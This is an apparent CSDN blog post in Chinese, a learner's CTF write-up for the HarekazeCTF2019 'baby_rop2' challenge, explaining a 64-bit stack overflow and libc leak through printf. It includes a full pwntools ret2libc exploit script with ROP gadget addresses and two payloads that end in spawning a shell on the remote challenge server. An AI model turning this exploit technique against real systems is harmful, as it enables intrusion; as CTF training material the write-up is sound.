• [HarekazeCTF2019]baby_rop2


    小白垃圾笔记,不建议阅读。

    这道题学到了两个思想吧:

    1.一个是有的函数泄露libc打印不写出来。

    2.另一个是printf函数的利用吧。

    3.栈对齐好像是只有system有。

    分析下题目吧:

    64位 绕过nx

    本来以为第10行,有坑呢。结果好像是我想多了。

    第九行存在溢出。

     嗯,啥也没有。

     

    那么大概思路就是泄露libc了。

    本来我也是想泄露printf的got的,没打通,然后就去搜教程了。没办法。谁让咱菜呢。

    网上的脚本有两个一个是pop了两个参数,一个是pop了一个参数。

    我都试了下,没有问题,也就是说printf函数pop一个就可以。

    脚本如下区别是第一个payload。

    1. from pwn import *
    2. from LibcSearcher import *
    3. debug=0
    4. if debug:
    5. p=process('./babyrop2')
    6. elf=ELF('./babyrop2')
    7. #libc=ELF('/lib/i386-linux-gnu/libc.so.6')
    8. #p=process('',env={'LD_PRELOAD':'./libc.so'})
    9. context.log_level='debug'
    10. #gdb.attach(p)
    11. libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    12. else:
    13. p=remote('node4.buuoj.cn',25269)
    14. elf=ELF('./babyrop2')
    15. libc=ELF('./libc.so.6')
    16. context.log_level='debug'
    17. def ru(x):
    18. return p.recvuntil(x)
    19. def se(x):
    20. p.send(x)
    21. def sl(x):
    22. p.sendline(x)
    23. pop_rdi_addr= 0x0000000000400733 # : pop rdi ; ret
    24. ret_addr= 0x00000000004004d1 # : ret
    25. pop_rsi_r15_addr=0x0000000000400731 #: pop rsi ; pop r15 ; ret
    26. printf_plt_addr=elf.plt['printf']
    27. printf_got_addr=elf.got['printf']
    28. main_addr=elf.sym['main']
    29. read_addr=elf.got['read']
    30. #main_addr=0x0000000000400636
    31. format_str=0x0000000000400770
    32. ru(b'name?')
    33. #下边这一行是只pop一个参数的
    34. #payload=b'b'*0x28+p64(pop_rdi_addr)+p64(read_addr)+p64(printf_plt_addr)+p64(main_addr)
    35. #这一行是pop两个参数的。
    36. payload = b'a'*0x28+p64(pop_rdi_addr)+p64(format_str)+p64(pop_rsi_r15_addr)+p64(read_addr)+p64(0)+p64(printf_plt_addr)+p64(main_addr)
    37. # read_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    38. se(payload+b'\n')
    39. read_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    40. #printf_addr=u32(p.recv(4))
    41. print(hex(read_addr))
    42. #libc=LibcSearcher('printf',printf_addr)
    43. #libc_base_addr=printf_addr-libc.dump('printf')
    44. #system_addr=libc_base_addr+libc.dump('system')
    45. #bin_sh_addr=libc_base_addr+libc.dump('str_bin_sh')
    46. libc_base_addr=read_addr-libc.sym['read']
    47. system_addr=libc_base_addr+ libc.sym['system']
    48. bin_sh_addr=libc_base_addr+ next(libc.search(b'/bin/sh\x00'))
    49. payload2=b'a'*(0x20+8)+p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(system_addr)
    50. ru(b'name?')
    51. se(payload2+b'b'*6+b'\n')
    52. #se(payload2.ljust(0x60,b'b')+b'\n')
    53. #ru(b'\n')
    54. p.interactive()
    55. #ROPgadget --binary --only "pop|ret" | grep "pop rdi"
    56. #ROPgadget --binary bin --only "pop|ret"
    57. #ROPgadget --binary ./level2_x64 --only "ret"
    58. #ROPgadget --binary babyrop2 |grep "pop rsi"
    59. #write_add=u32(p.recv(4))
    60. #addr=u32(r.recvuntil(b'\xf7')[-4:])
    61. #puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    62. #sa(b'wish!\n', b'%11$p')
    63. #rl(b'0x')
    64. #canary = int(p.recv(16), 16)

    flag在/home/babyrop2/flag

     

  • 相关阅读:
    python聚类分析如何可视化?
    【计算机视觉 | 目标检测】arxiv 计算机视觉关于目标检测的学术速递(9 月 14 日论文合集)
    坑爹的jack-server
    swagger
    【Mac】鼠标控制\移动\调整窗口大小BBT|边缘触发调整音量\切换桌面
    浅谈Python异步编程
    什么是开关电源测试系统?如何用它进行测试?
    为什么刀具数据库无法打开?
    【网络】对于我前面UDP博客的补充
    C++ 输入输出及txt文件输入示例
  • 原文地址:https://blog.csdn.net/m0_74020775/article/details/130853951